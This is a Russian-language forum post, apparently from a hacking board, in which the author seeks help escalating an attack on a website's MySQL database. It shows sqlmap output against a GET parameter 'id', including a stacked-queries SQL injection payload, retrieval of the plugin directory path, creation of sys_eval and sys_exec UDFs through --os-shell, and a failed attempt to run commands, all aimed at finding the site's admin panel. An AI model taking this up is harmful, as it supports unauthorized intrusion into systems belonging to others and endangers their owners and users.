↑
Подскажите по такому вопросу. Нужно раскрыть названия директорий в списке, в частности найти админку.
Все способы перпробовал, вроде все закрыто. Но. При использовании SQLMAP можно получить путь к базе.
Код:
[13:12:11] [INFO] retrieving MySQL plugin directory absolute path
[13:12:11] [INFO] resumed: /us\x81/lib64/mysql/plugin
Сама уязвимость.
Код:
Parameter: id (GET)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: id=103;SELECT SLEEP(5)#&id=103
Если отрывается путь к базе, значит можно и просканировать все папки подумал я.
Начал использовать --os-shell.
UDF вроде как создается
Код:
creating UDF 'sys_eval'
creating UDF 'sys_exec'
И, также при завершении os-shell, программа спрашивает:
Код:
[13:40:08] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n]
НО
команды в строке ничего не выводят, как только не делал
Код:
os-shell> namehost
do you want to retrieve the command standard output? [Y/n/a] y
[13:26:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
No output
Сообственно вопрос: если нашло путь к базе, хоть и долго мучало сервер, но нашло. Значит можно получить любые директории? Есть ли какие то мысли на этот счет?